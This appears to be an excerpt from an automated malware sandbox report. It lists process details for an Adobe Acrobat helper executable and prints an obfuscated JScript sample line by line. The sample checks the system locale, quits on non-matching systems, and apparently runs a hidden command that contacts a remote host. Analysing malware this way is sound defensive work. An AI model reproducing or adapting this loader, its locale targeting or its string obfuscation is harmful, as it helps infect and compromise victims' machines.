Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function fqokko() { |
|
1 | lasahsft = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var vectpqtv = this[ohptjp + seazbg + grvjw + fzjqzsdvx + lnkibyby + bczpa + ynjat + awnbbkbp] ( this[yilqyxydf + hxfpvg + ejxaj + grvjw + snabha + ohptjp + awnbbkbp][bgcioja + grvjw + lnkibyby + seazbg + awnbbkbp + lnkibyby + qvohddwpr + sidwvtmn + bkxqtnn + lnkibyby + ejxaj + awnbbkbp] ( yilqyxydf + hxfpvg + ejxaj + grvjw + snabha + ohptjp + awnbbkbp + mhrjqm + hxfpvg + ebibi + lnkibyby + wtbmgnya + wtbmgnya ) [kcbhh + lnkibyby + xwueejvwx + kcbhh + lnkibyby + seazbg + lhqijm] ( pinxctlpt + upnnezan + jtochy + smbbwsjfs + acrgiqnbt + bgcioja + dbtbnead + kcbhh + kcbhh + jtochy + mcmzhbzwk + udetw + acrgiqnbt + dbtbnead + hxfpvg + jtochy + kcbhh + bjopnyq + bgcioja + sixvaosi + ynjat + awnbbkbp + grvjw + sixvaosi + wtbmgnya + hhvuspnho + khjdjlqk + seazbg + ynjat + lnkibyby + wtbmgnya + bjopnyq + bczpa + ynjat + awnbbkbp + lnkibyby + grvjw + ynjat + seazbg + awnbbkbp + snabha + sixvaosi + ynjat + seazbg + wtbmgnya + bjopnyq + rgxngjxbj + sixvaosi + ejxaj + seazbg + wtbmgnya + lnkibyby ), 16 ); |
|
3 | for ( wpxvlqvu = 0 ; wpxvlqvu < lasahsft[wtbmgnya + lnkibyby + ynjat + xwueejvwx + awnbbkbp + ebibi] ; ++ wpxvlqvu ) | |
4 | { | |
5 | if ( vectpqtv == lasahsft[wpxvlqvu] ) | |
6 | { | |
7 | vectpqtv = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( vectpqtv !== true ) | |
12 | this[yilqyxydf + hxfpvg + ejxaj + grvjw + snabha + ohptjp + awnbbkbp][crniwy + lagwuqhha + snabha + awnbbkbp] ( ); | |
13 | this[yilqyxydf + hxfpvg + ejxaj + grvjw + snabha + ohptjp + awnbbkbp][bgcioja + grvjw + lnkibyby + seazbg + awnbbkbp + lnkibyby + qvohddwpr + sidwvtmn + bkxqtnn + lnkibyby + ejxaj + awnbbkbp] ( yilqyxydf + hxfpvg + ejxaj + grvjw + snabha + ohptjp + awnbbkbp + mhrjqm + hxfpvg + ebibi + lnkibyby + wtbmgnya + wtbmgnya ) [grvjw + lagwuqhha + ynjat] ( ejxaj + ncpbzklwa + lhqijm + hhvuspnho + jvydauyrk + ejxaj + hhvuspnho + ohptjp + sixvaosi + qqvapqd + lnkibyby + grvjw + fzjqzsdvx + ebibi + lnkibyby + wtbmgnya + wtbmgnya + mhrjqm + lnkibyby + sardd + lnkibyby + hhvuspnho + tpsinp + bgcioja + sixvaosi + ncpbzklwa + ncpbzklwa + seazbg + ynjat + lhqijm + hhvuspnho + qomfu + bczpa + ynjat + lrpothrxo + sixvaosi + qrftbpu + lnkibyby + tpsinp + yilqyxydf + lnkibyby + sidwvtmn + kcbhh + lnkibyby + lcbnbfcps + lagwuqhha + lnkibyby + fzjqzsdvx + awnbbkbp + hhvuspnho + tpsinp + qvohddwpr + lagwuqhha + awnbbkbp + ovhvr + snabha + wtbmgnya + lnkibyby + hhvuspnho + lejryk + awnbbkbp + lnkibyby + ncpbzklwa + ohptjp + lejryk + bjopnyq + snabha + ynjat + lrpothrxo + sixvaosi + snabha + ejxaj + lnkibyby + mhrjqm + ohptjp + lhqijm + zdhoe + hhvuspnho + ebibi + awnbbkbp + awnbbkbp + ohptjp + hvvqb + jvydauyrk + jvydauyrk + tvkejyw + tadpwp + yvsekks + mhrjqm + tvkejyw + cjbwueow + yvsekks + mhrjqm + tvkejyw + mhrjqm + eijwgqp + immtl + mwwrod + jvydauyrk + snabha + ynjat + lrpothrxo + sixvaosi + snabha + ejxaj + lnkibyby + mhrjqm + ohptjp + ebibi + ohptjp + qomfu + ntrfji + ntrfji + fzjqzsdvx + awnbbkbp + seazbg + grvjw + awnbbkbp + hhvuspnho + lejryk + awnbbkbp + lnkibyby + ncpbzklwa + ohptjp + lejryk + bjopnyq + snabha + ynjat + lrpothrxo + sixvaosi + snabha + ejxaj + lnkibyby + mhrjqm + ohptjp + lhqijm + zdhoe + ntrfji + ntrfji + ejxaj + ncpbzklwa + lhqijm + hhvuspnho + jvydauyrk + ejxaj + hhvuspnho + ynjat + lnkibyby + awnbbkbp + hhvuspnho + lagwuqhha + fzjqzsdvx + lnkibyby + hhvuspnho + bjopnyq + bjopnyq + tvkejyw + tadpwp + yvsekks + mhrjqm + tvkejyw + cjbwueow + yvsekks + mhrjqm + tvkejyw + mhrjqm + eijwgqp + immtl + mwwrod + znmnult + aelqs + aelqs + aelqs + aelqs + bjopnyq + lhqijm + seazbg + lrpothrxo + qqvapqd + qqvapqd + qqvapqd + grvjw + sixvaosi + sixvaosi + awnbbkbp + bjopnyq + ntrfji + ntrfji + ejxaj + ncpbzklwa + lhqijm + hhvuspnho + jvydauyrk + ejxaj + hhvuspnho + grvjw + lnkibyby + xwueejvwx + fzjqzsdvx + lrpothrxo + grvjw + yvsekks + eijwgqp + hhvuspnho + jvydauyrk + fzjqzsdvx + hhvuspnho + bjopnyq + bjopnyq + tvkejyw + tadpwp + yvsekks + mhrjqm + tvkejyw + cjbwueow + yvsekks + mhrjqm + tvkejyw + mhrjqm + eijwgqp + immtl + mwwrod + znmnult + aelqs + aelqs + aelqs + aelqs + bjopnyq + lhqijm + seazbg + lrpothrxo + qqvapqd + qqvapqd + qqvapqd + grvjw + sixvaosi + sixvaosi + awnbbkbp + bjopnyq + tadpwp + qrxrfryji + immtl + eijwgqp + eijwgqp + eijwgqp + aelqs + mwwrod + eijwgqp + yvsekks + tvkejyw + yvsekks + tvkejyw + tadpwp + mhrjqm + lhqijm + wtbmgnya + wtbmgnya, 0, false ); |
|
14 | } | |
15 | udetw = "e"; | |
16 | udetw = "S"; | |
17 | udetw = "u"; | |
18 | udetw = "q"; | |
19 | udetw = "i"; | |
20 | udetw = "T"; | |
21 | udetw = "d"; | |
22 | udetw = "p"; | |
23 | udetw = "U"; | |
24 | udetw = "w"; | |
25 | udetw = "M"; | |
26 | udetw = "Q"; | |
27 | udetw = "T"; | |
28 | udetw = "q"; | |
29 | udetw = "h"; | |
30 | udetw = "B"; | |
31 | udetw = "o"; | |
32 | udetw = "q"; | |
33 | udetw = "R"; | |
34 | udetw = "O"; | |
35 | udetw = "g"; | |
36 | udetw = "e"; | |
37 | udetw = "c"; | |
38 | udetw = "c"; | |
39 | udetw = "o"; | |
40 | udetw = "k"; | |
41 | udetw = "i"; | |
42 | udetw = "S"; | |
43 | udetw = "E"; | |
44 | udetw = "E"; | |
45 | udetw = "O"; | |
46 | udetw = "P"; | |
47 | udetw = "g"; | |
48 | udetw = "e"; | |
49 | udetw = "X"; | |
50 | udetw = "f"; | |
51 | udetw = "K"; | |
52 | udetw = "P"; | |
53 | udetw = "i"; | |
54 | udetw = "Q"; | |
55 | udetw = "T"; | |
56 | ebibi = "U"; | |
57 | ebibi = "q"; | |
58 | ebibi = "N"; | |
59 | ebibi = "c"; | |
60 | ebibi = "B"; | |
61 | ebibi = "E"; | |
62 | ebibi = "y"; | |
63 | ebibi = "V"; | |
64 | ebibi = "U"; | |
65 | ebibi = "E"; | |
66 | ebibi = "h"; | |
67 | tpsinp = "G"; | |
68 | tpsinp = "p"; | |
69 | tpsinp = "G"; | |
70 | tpsinp = "C"; | |
71 | tpsinp = "U"; | |
72 | tpsinp = "B"; | |
73 | tpsinp = "-"; | |
74 | sixvaosi = "U"; | |
75 | sixvaosi = "S"; | |
76 | sixvaosi = "U"; | |
77 | sixvaosi = "v"; | |
78 | sixvaosi = "v"; | |
79 | sixvaosi = "K"; | |
80 | sixvaosi = "T"; | |
81 | sixvaosi = "U"; | |
82 | sixvaosi = "B"; | |
83 | sixvaosi = "o"; | |
84 | lrpothrxo = "e"; | |
85 | lrpothrxo = "O"; | |
86 | lrpothrxo = "W"; | |
87 | lrpothrxo = "A"; | |
88 | lrpothrxo = "H"; | |
89 | lrpothrxo = "h"; | |
90 | lrpothrxo = "A"; | |
91 | lrpothrxo = "c"; | |
92 | lrpothrxo = "j"; | |
93 | lrpothrxo = "p"; | |
94 | lrpothrxo = "l"; | |
95 | lrpothrxo = "Z"; | |
96 | lrpothrxo = "y"; | |
97 | lrpothrxo = "A"; | |
98 | lrpothrxo = "u"; | |
99 | lrpothrxo = "n"; | |
100 | lrpothrxo = "G"; | |
101 | lrpothrxo = "Z"; | |
102 | lrpothrxo = "g"; | |
103 | lrpothrxo = "v"; | |
104 | rgxngjxbj = "v"; | |
105 | rgxngjxbj = "k"; | |
106 | rgxngjxbj = "j"; | |
107 | rgxngjxbj = "S"; | |
108 | rgxngjxbj = "c"; | |
109 | rgxngjxbj = "v"; | |
110 | rgxngjxbj = "p"; | |
111 | rgxngjxbj = "N"; | |
112 | rgxngjxbj = "I"; | |
113 | rgxngjxbj = "f"; | |
114 | rgxngjxbj = "U"; | |
115 | rgxngjxbj = "o"; | |
116 | rgxngjxbj = "m"; | |
117 | rgxngjxbj = "U"; | |
118 | rgxngjxbj = "k"; | |
119 | rgxngjxbj = "t"; | |
120 | rgxngjxbj = "s"; | |
121 | rgxngjxbj = "f"; | |
122 | rgxngjxbj = "M"; | |
123 | rgxngjxbj = "p"; | |
124 | rgxngjxbj = "i"; | |
125 | rgxngjxbj = "n"; | |
126 | rgxngjxbj = "E"; | |
127 | rgxngjxbj = "i"; | |
128 | rgxngjxbj = "f"; | |
129 | rgxngjxbj = "p"; | |
130 | rgxngjxbj = "X"; | |
131 | rgxngjxbj = "y"; | |
132 | rgxngjxbj = "k"; | |
133 | rgxngjxbj = "E"; | |
134 | rgxngjxbj = "e"; | |
135 | rgxngjxbj = "X"; | |
136 | rgxngjxbj = "g"; | |
137 | rgxngjxbj = "v"; | |
138 | rgxngjxbj = "J"; | |
139 | rgxngjxbj = "d"; | |
140 | rgxngjxbj = "B"; | |
141 | rgxngjxbj = "m"; | |
142 | rgxngjxbj = "E"; | |
143 | rgxngjxbj = "L"; | |
144 | hhvuspnho = "D"; | |
145 | hhvuspnho = "w"; | |
146 | hhvuspnho = "Y"; | |
147 | hhvuspnho = "t"; | |
148 | hhvuspnho = "L"; | |
149 | hhvuspnho = "f"; | |
150 | hhvuspnho = "g"; | |
151 | hhvuspnho = "f"; | |
152 | hhvuspnho = "Y"; | |
153 | hhvuspnho = "d"; | |
154 | hhvuspnho = "D"; | |
155 | hhvuspnho = "s"; | |
156 | hhvuspnho = "B"; | |
157 | hhvuspnho = "M"; | |
158 | hhvuspnho = "W"; | |
159 | hhvuspnho = "Z"; | |
160 | hhvuspnho = "G"; | |
161 | hhvuspnho = "z"; | |
162 | hhvuspnho = "L"; | |
163 | hhvuspnho = "X"; | |
164 | hhvuspnho = "i"; | |
165 | hhvuspnho = "g"; | |
166 | hhvuspnho = "b"; | |
167 | hhvuspnho = "A"; | |
168 | hhvuspnho = "D"; | |
169 | hhvuspnho = "k"; | |
170 | hhvuspnho = "b"; | |
171 | hhvuspnho = "Q"; | |
172 | hhvuspnho = "n"; | |
173 | hhvuspnho = "J"; | |
174 | hhvuspnho = "g"; | |
175 | hhvuspnho = "T"; | |
176 | hhvuspnho = "H"; | |
177 | hhvuspnho = " "; | |
178 | bczpa = "q"; | |
179 | bczpa = "W"; | |
180 | bczpa = "d"; | |
181 | bczpa = "K"; | |
182 | bczpa = "B"; | |
183 | bczpa = "e"; | |
184 | bczpa = "Y"; | |
185 | bczpa = "t"; | |
186 | bczpa = "e"; | |
187 | bczpa = "y"; | |
188 | bczpa = "B"; | |
189 | bczpa = "p"; | |
190 | bczpa = "I"; | |
191 | upnnezan = "C"; | |
192 | upnnezan = "a"; | |
193 | upnnezan = "t"; | |
194 | upnnezan = "y"; | |
195 | upnnezan = "H"; | |
196 | upnnezan = "P"; | |
197 | upnnezan = "O"; | |
198 | upnnezan = "A"; | |
199 | upnnezan = "N"; | |
200 | upnnezan = "n"; | |
201 | upnnezan = "y"; | |
202 | upnnezan = "G"; | |
203 | upnnezan = "j"; | |
204 | upnnezan = "A"; | |
205 | upnnezan = "r"; | |
206 | upnnezan = "K"; | |
207 | kcbhh = "Q"; | |
208 | kcbhh = "F"; | |
209 | kcbhh = "U"; | |
210 | kcbhh = "l"; | |
211 | kcbhh = "a"; | |
212 | kcbhh = "X"; | |
213 | kcbhh = "G"; | |
214 | kcbhh = "E"; | |
215 | kcbhh = "u"; | |
216 | kcbhh = "p"; | |
217 | kcbhh = "N"; | |
218 | kcbhh = "P"; | |
219 | kcbhh = "h"; | |
220 | kcbhh = "C"; | |
221 | kcbhh = "u"; | |
222 | kcbhh = "o"; | |
223 | kcbhh = "G"; | |
224 | kcbhh = "G"; | |
225 | kcbhh = "A"; | |
226 | kcbhh = "U"; | |
227 | kcbhh = "j"; | |
228 | kcbhh = "O"; | |
229 | kcbhh = "E"; | |
230 | kcbhh = "l"; | |
231 | kcbhh = "X"; | |
232 | kcbhh = "V"; | |
233 | kcbhh = "o"; | |
234 | kcbhh = "U"; | |
235 | kcbhh = "z"; | |
236 | kcbhh = "J"; | |
237 | kcbhh = "D"; | |
238 | kcbhh = "R"; | |
239 | fzjqzsdvx = "c"; | |
240 | fzjqzsdvx = "C"; | |
241 | fzjqzsdvx = "P"; | |
242 | fzjqzsdvx = "l"; | |
243 | fzjqzsdvx = "u"; | |
244 | fzjqzsdvx = "I"; | |
245 | fzjqzsdvx = "z"; | |
246 | fzjqzsdvx = "i"; | |
247 | fzjqzsdvx = "P"; | |
248 | fzjqzsdvx = "I"; | |
249 | fzjqzsdvx = "R"; | |
250 | fzjqzsdvx = "P"; | |
251 | fzjqzsdvx = "a"; | |
252 | fzjqzsdvx = "c"; | |
253 | fzjqzsdvx = "h"; | |
254 | fzjqzsdvx = "C"; | |
255 | fzjqzsdvx = "l"; | |
256 | fzjqzsdvx = "p"; | |
257 | fzjqzsdvx = "s"; | |
258 | fzjqzsdvx = "S"; | |
259 | fzjqzsdvx = "z"; | |
260 | fzjqzsdvx = "q"; | |
261 | fzjqzsdvx = "n"; | |
262 | fzjqzsdvx = "V"; | |
263 | fzjqzsdvx = "n"; | |
264 | fzjqzsdvx = "s"; | |
265 | ovhvr = "O"; | |
266 | ovhvr = "d"; | |
267 | ovhvr = "x"; | |
268 | ovhvr = "N"; | |
269 | ovhvr = "P"; | |
270 | ovhvr = "t"; | |
271 | ovhvr = "i"; | |
272 | ovhvr = "a"; | |
273 | ovhvr = "L"; | |
274 | ovhvr = "B"; | |
275 | ovhvr = "V"; | |
276 | ovhvr = "l"; | |
277 | ovhvr = "F"; | |
278 | ovhvr = "o"; | |
279 | ovhvr = "b"; | |
280 | ovhvr = "P"; | |
281 | ovhvr = "U"; | |
282 | ovhvr = "y"; | |
283 | ovhvr = "o"; | |
284 | ovhvr = "F"; | |
285 | jtochy = "q"; | |
286 | jtochy = "o"; | |
287 | jtochy = "d"; | |
288 | jtochy = "O"; | |
289 | jtochy = "j"; | |
290 | jtochy = "v"; | |
291 | jtochy = "T"; | |
292 | jtochy = "Z"; | |
293 | jtochy = "M"; | |
294 | jtochy = "F"; | |
295 | jtochy = "K"; | |
296 | jtochy = "s"; | |
297 | jtochy = "N"; | |
298 | jtochy = "b"; | |
299 | jtochy = "b"; | |
300 | jtochy = "v"; | |
301 | jtochy = "C"; | |
302 | jtochy = "E"; | |
303 | jtochy = "F"; | |
304 | jtochy = "w"; | |
305 | jtochy = "z"; | |
306 | jtochy = "x"; | |
307 | jtochy = "S"; | |
308 | jtochy = "D"; | |
309 | jtochy = "X"; | |
310 | jtochy = "s"; | |
311 | jtochy = "y"; | |
312 | jtochy = "l"; | |
313 | jtochy = "E"; | |
314 | crniwy = "P"; | |
315 | crniwy = "l"; | |
316 | crniwy = "W"; | |
317 | crniwy = "Z"; | |
318 | crniwy = "c"; | |
319 | crniwy = "v"; | |
320 | crniwy = "P"; | |
321 | crniwy = "m"; | |
322 | crniwy = "w"; | |
323 | crniwy = "n"; | |
324 | crniwy = "l"; | |
325 | crniwy = "a"; | |
326 | crniwy = "w"; | |
327 | crniwy = "a"; | |
328 | crniwy = "I"; | |
329 | crniwy = "h"; | |
330 | crniwy = "w"; | |
331 | crniwy = "t"; | |
332 | crniwy = "G"; | |
333 | crniwy = "k"; | |
334 | crniwy = "t"; | |
335 | crniwy = "e"; | |
336 | crniwy = "O"; | |
337 | crniwy = "f"; | |
338 | crniwy = "Q"; | |
339 | crniwy = "W"; | |
340 | crniwy = "i"; | |
341 | crniwy = "m"; | |
342 | crniwy = "x"; | |
343 | crniwy = "d"; | |
344 | crniwy = "G"; | |
345 | crniwy = "b"; | |
346 | crniwy = "r"; | |
347 | crniwy = "t"; | |
348 | crniwy = "t"; | |
349 | crniwy = "v"; | |
350 | crniwy = "v"; | |
351 | crniwy = "j"; | |
352 | crniwy = "t"; | |
353 | crniwy = "O"; | |
354 | crniwy = "h"; | |
355 | crniwy = "Y"; | |
356 | crniwy = "Q"; | |
357 | grvjw = "o"; | |
358 | grvjw = "w"; | |
359 | grvjw = "H"; | |
360 | grvjw = "u"; | |
361 | grvjw = "z"; | |
362 | grvjw = "n"; | |
363 | grvjw = "T"; | |
364 | grvjw = "M"; | |
365 | grvjw = "A"; | |
366 | grvjw = "p"; | |
367 | grvjw = "W"; | |
368 | grvjw = "o"; | |
369 | grvjw = "r"; | |
370 | yilqyxydf = "M"; | |
371 | yilqyxydf = "r"; | |
372 | yilqyxydf = "O"; | |
373 | yilqyxydf = "Y"; | |
374 | yilqyxydf = "a"; | |
375 | yilqyxydf = "V"; | |
376 | yilqyxydf = "N"; | |
377 | yilqyxydf = "k"; | |
378 | yilqyxydf = "H"; | |
379 | yilqyxydf = "I"; | |
380 | yilqyxydf = "G"; | |
381 | yilqyxydf = "J"; | |
382 | yilqyxydf = "y"; | |
383 | yilqyxydf = "E"; | |
384 | yilqyxydf = "c"; | |
385 | yilqyxydf = "A"; | |
386 | yilqyxydf = "u"; | |
387 | yilqyxydf = "W"; | |
388 | yilqyxydf = "o"; | |
389 | yilqyxydf = "i"; | |
390 | yilqyxydf = "Q"; | |
391 | yilqyxydf = "F"; | |
392 | yilqyxydf = "Q"; | |
393 | yilqyxydf = "y"; | |
394 | yilqyxydf = "b"; | |
395 | yilqyxydf = "g"; | |
396 | yilqyxydf = "r"; | |
397 | yilqyxydf = "o"; | |
398 | yilqyxydf = "C"; | |
399 | yilqyxydf = "Z"; | |
400 | yilqyxydf = "n"; | |
401 | yilqyxydf = "i"; | |
402 | yilqyxydf = "O"; | |
403 | yilqyxydf = "D"; | |
404 | yilqyxydf = "W"; | |
405 | mcmzhbzwk = "P"; | |
406 | mcmzhbzwk = "i"; | |
407 | mcmzhbzwk = "n"; | |
408 | mcmzhbzwk = "N"; | |
409 | mwwrod = "a"; | |
410 | mwwrod = "i"; | |
411 | mwwrod = "h"; | |
412 | mwwrod = "B"; | |
413 | mwwrod = "e"; | |
414 | mwwrod = "j"; | |
415 | mwwrod = "w"; | |
416 | mwwrod = "Y"; | |
417 | mwwrod = "r"; | |
418 | mwwrod = "b"; | |
419 | mwwrod = "W"; | |
420 | mwwrod = "a"; | |
421 | mwwrod = "N"; | |
422 | mwwrod = "M"; | |
423 | mwwrod = "T"; | |
424 | mwwrod = "x"; | |
425 | mwwrod = "W"; | |
426 | mwwrod = "G"; | |
427 | mwwrod = "Q"; | |
428 | mwwrod = "c"; | |
429 | mwwrod = "O"; | |
430 | mwwrod = "R"; | |
431 | mwwrod = "M"; | |
432 | mwwrod = "P"; | |
433 | mwwrod = "o"; | |
434 | mwwrod = "X"; | |
435 | mwwrod = "g"; | |
436 | mwwrod = "E"; | |
437 | mwwrod = "o"; | |
438 | mwwrod = "i"; | |
439 | mwwrod = "N"; | |
440 | mwwrod = "q"; | |
441 | mwwrod = "u"; | |
442 | mwwrod = "5"; | |
443 | seazbg = "u"; | |
444 | seazbg = "B"; | |
445 | seazbg = "d"; | |
446 | seazbg = "M"; | |
447 | seazbg = "N"; | |
448 | seazbg = "B"; | |
449 | seazbg = "I"; | |
450 | seazbg = "q"; | |
451 | seazbg = "s"; | |
452 | seazbg = "f"; | |
453 | seazbg = "k"; | |
454 | seazbg = "I"; | |
455 | seazbg = "v"; | |
456 | seazbg = "U"; | |
457 | seazbg = "K"; | |
458 | seazbg = "I"; | |
459 | seazbg = "b"; | |
460 | seazbg = "M"; | |
461 | seazbg = "I"; | |
462 | seazbg = "A"; | |
463 | seazbg = "j"; | |
464 | seazbg = "a"; | |
465 | smbbwsjfs = "e"; | |
466 | smbbwsjfs = "L"; | |
467 | smbbwsjfs = "A"; | |
468 | smbbwsjfs = "S"; | |
469 | smbbwsjfs = "Y"; | |
470 | smbbwsjfs = "i"; | |
471 | smbbwsjfs = "Y"; | |
472 | bjopnyq = "E"; | |
473 | bjopnyq = "E"; | |
474 | bjopnyq = "H"; | |
475 | bjopnyq = "l"; | |
476 | bjopnyq = "t"; | |
477 | bjopnyq = "o"; | |
478 | bjopnyq = "Y"; | |
479 | bjopnyq = "v"; | |
480 | bjopnyq = "L"; | |
481 | bjopnyq = "Y"; | |
482 | bjopnyq = "i"; | |
483 | bjopnyq = "o"; | |
484 | bjopnyq = "j"; | |
485 | bjopnyq = "d"; | |
486 | bjopnyq = "y"; | |
487 | bjopnyq = "F"; | |
488 | bjopnyq = "p"; | |
489 | bjopnyq = "X"; | |
490 | bjopnyq = "f"; | |
491 | bjopnyq = "B"; | |
492 | bjopnyq = "o"; | |
493 | bjopnyq = "A"; | |
494 | bjopnyq = "W"; | |
495 | bjopnyq = "u"; | |
496 | bjopnyq = "u"; | |
497 | bjopnyq = "d"; | |
498 | bjopnyq = "z"; | |
499 | bjopnyq = "w"; | |
500 | bjopnyq = "Z"; | |
501 | bjopnyq = "S"; | |
502 | bjopnyq = "E"; | |
503 | bjopnyq = "n"; | |
504 | bjopnyq = "Z"; | |
505 | bjopnyq = "x"; | |
506 | bjopnyq = "A"; | |
507 | bjopnyq = "X"; | |
508 | bjopnyq = "W"; | |
509 | bjopnyq = "n"; | |
510 | bjopnyq = "v"; | |
511 | bjopnyq = "M"; | |
512 | bjopnyq = "\\"; | |
513 | zdhoe = "w"; | |
514 | zdhoe = "v"; | |
515 | zdhoe = "Q"; | |
516 | zdhoe = "O"; | |
517 | zdhoe = "f"; | |
518 | bkxqtnn = "f"; | |
519 | bkxqtnn = "Z"; | |
520 | bkxqtnn = "C"; | |
521 | bkxqtnn = "J"; | |
522 | bkxqtnn = "O"; | |
523 | bkxqtnn = "r"; | |
524 | bkxqtnn = "j"; | |
525 | hvvqb = "o"; | |
526 | hvvqb = "J"; | |
527 | hvvqb = "y"; | |
528 | hvvqb = "V"; | |
529 | hvvqb = "l"; | |
530 | hvvqb = "b"; | |
531 | hvvqb = "K"; | |
532 | hvvqb = "q"; | |
533 | hvvqb = "R"; | |
534 | hvvqb = "v"; | |
535 | hvvqb = "w"; | |
536 | hvvqb = "Q"; | |
537 | hvvqb = "C"; | |
538 | hvvqb = "D"; | |
539 | hvvqb = "O"; | |
540 | hvvqb = "Z"; | |
541 | hvvqb = "V"; | |
542 | hvvqb = "p"; | |
543 | hvvqb = "k"; | |
544 | hvvqb = "C"; | |
545 | hvvqb = "U"; | |
546 | hvvqb = "U"; | |
547 | hvvqb = "W"; | |
548 | hvvqb = "c"; | |
549 | hvvqb = "B"; | |
550 | hvvqb = "p"; | |
551 | hvvqb = "K"; | |
552 | hvvqb = "z"; | |
553 | hvvqb = "h"; | |
554 | hvvqb = "N"; | |
555 | hvvqb = "m"; | |
556 | hvvqb = "G"; | |
557 | hvvqb = "r"; | |
558 | hvvqb = ":"; | |
559 | znmnult = "w"; | |
560 | znmnult = "s"; | |
561 | znmnult = "m"; | |
562 | znmnult = "a"; | |
563 | znmnult = "l"; | |
564 | znmnult = "T"; | |
565 | znmnult = "i"; | |
566 | znmnult = "c"; | |
567 | znmnult = "n"; | |
568 | znmnult = "@"; | |
569 | sidwvtmn = "Q"; | |
570 | sidwvtmn = "T"; | |
571 | sidwvtmn = "U"; | |
572 | sidwvtmn = "R"; | |
573 | sidwvtmn = "S"; | |
574 | sidwvtmn = "e"; | |
575 | sidwvtmn = "v"; | |
576 | sidwvtmn = "j"; | |
577 | sidwvtmn = "I"; | |
578 | sidwvtmn = "N"; | |
579 | sidwvtmn = "L"; | |
580 | sidwvtmn = "A"; | |
581 | sidwvtmn = "C"; | |
582 | sidwvtmn = "q"; | |
583 | sidwvtmn = "D"; | |
584 | sidwvtmn = "n"; | |
585 | sidwvtmn = "n"; | |
586 | sidwvtmn = "U"; | |
587 | sidwvtmn = "T"; | |
588 | sidwvtmn = "u"; | |
589 | sidwvtmn = "u"; | |
590 | sidwvtmn = "L"; | |
591 | sidwvtmn = "M"; | |
592 | sidwvtmn = "h"; | |
593 | sidwvtmn = "G"; | |
594 | sidwvtmn = "I"; | |
595 | sidwvtmn = "b"; | |
596 | sidwvtmn = "L"; | |
597 | sidwvtmn = "A"; | |
598 | sidwvtmn = "F"; | |
599 | sidwvtmn = "N"; | |
600 | sidwvtmn = "F"; | |
601 | sidwvtmn = "d"; | |
602 | sidwvtmn = "K"; | |
603 | sidwvtmn = "n"; | |
604 | sidwvtmn = "Z"; | |
605 | sidwvtmn = "g"; | |
606 | sidwvtmn = "D"; | |
607 | sidwvtmn = "w"; | |
608 | sidwvtmn = "F"; | |
609 | sidwvtmn = "y"; | |
610 | sidwvtmn = "b"; | |
611 | khjdjlqk = "Z"; | |
612 | khjdjlqk = "n"; | |
613 | khjdjlqk = "k"; | |
614 | khjdjlqk = "x"; | |
615 | khjdjlqk = "E"; | |
616 | khjdjlqk = "Q"; | |
617 | khjdjlqk = "R"; | |
618 | khjdjlqk = "e"; | |
619 | khjdjlqk = "s"; | |
620 | khjdjlqk = "B"; | |
621 | khjdjlqk = "G"; | |
622 | khjdjlqk = "O"; | |
623 | khjdjlqk = "W"; | |
624 | khjdjlqk = "N"; | |
625 | khjdjlqk = "v"; | |
626 | khjdjlqk = "t"; | |
627 | khjdjlqk = "E"; | |
628 | khjdjlqk = "i"; | |
629 | khjdjlqk = "I"; | |
630 | khjdjlqk = "Q"; | |
631 | khjdjlqk = "M"; | |
632 | khjdjlqk = "I"; | |
633 | khjdjlqk = "q"; | |
634 | khjdjlqk = "u"; | |
635 | khjdjlqk = "S"; | |
636 | khjdjlqk = "p"; | |
637 | khjdjlqk = "O"; | |
638 | khjdjlqk = "W"; | |
639 | khjdjlqk = "k"; | |
640 | khjdjlqk = "b"; | |
641 | khjdjlqk = "Y"; | |
642 | khjdjlqk = "P"; | |
643 | xwueejvwx = "V"; | |
644 | xwueejvwx = "D"; | |
645 | xwueejvwx = "Z"; | |
646 | xwueejvwx = "I"; | |
647 | xwueejvwx = "U"; | |
648 | xwueejvwx = "U"; | |
649 | xwueejvwx = "s"; | |
650 | xwueejvwx = "q"; | |
651 | xwueejvwx = "w"; | |
652 | xwueejvwx = "i"; | |
653 | xwueejvwx = "W"; | |
654 | xwueejvwx = "b"; | |
655 | xwueejvwx = "N"; | |
656 | xwueejvwx = "l"; | |
657 | xwueejvwx = "X"; | |
658 | xwueejvwx = "n"; | |
659 | xwueejvwx = "s"; | |
660 | xwueejvwx = "j"; | |
661 | xwueejvwx = "F"; | |
662 | xwueejvwx = "k"; | |
663 | xwueejvwx = "f"; | |
664 | xwueejvwx = "T"; | |
665 | xwueejvwx = "w"; | |
666 | xwueejvwx = "d"; | |
667 | xwueejvwx = "J"; | |
668 | xwueejvwx = "S"; | |
669 | xwueejvwx = "A"; | |
670 | xwueejvwx = "e"; | |
671 | xwueejvwx = "d"; | |
672 | xwueejvwx = "g"; | |
673 | ejxaj = "L"; | |
674 | ejxaj = "C"; | |
675 | ejxaj = "y"; | |
676 | ejxaj = "T"; | |
677 | ejxaj = "I"; | |
678 | ejxaj = "s"; | |
679 | ejxaj = "o"; | |
680 | ejxaj = "w"; | |
681 | ejxaj = "S"; | |
682 | ejxaj = "I"; | |
683 | ejxaj = "g"; | |
684 | ejxaj = "c"; | |
685 | jvydauyrk = "v"; | |
686 | jvydauyrk = "o"; | |
687 | jvydauyrk = "P"; | |
688 | jvydauyrk = "T"; | |
689 | jvydauyrk = "J"; | |
690 | jvydauyrk = "F"; | |
691 | jvydauyrk = "L"; | |
692 | jvydauyrk = "b"; | |
693 | jvydauyrk = "J"; | |
694 | jvydauyrk = "q"; | |
695 | jvydauyrk = "l"; | |
696 | jvydauyrk = "G"; | |
697 | jvydauyrk = "K"; | |
698 | jvydauyrk = "G"; | |
699 | jvydauyrk = "a"; | |
700 | jvydauyrk = "k"; | |
701 | jvydauyrk = "/"; | |
702 | lagwuqhha = "l"; | |
703 | lagwuqhha = "Q"; | |
704 | lagwuqhha = "p"; | |
705 | lagwuqhha = "W"; | |
706 | lagwuqhha = "f"; | |
707 | lagwuqhha = "d"; | |
708 | lagwuqhha = "j"; | |
709 | lagwuqhha = "I"; | |
710 | lagwuqhha = "l"; | |
711 | lagwuqhha = "q"; | |
712 | lagwuqhha = "s"; | |
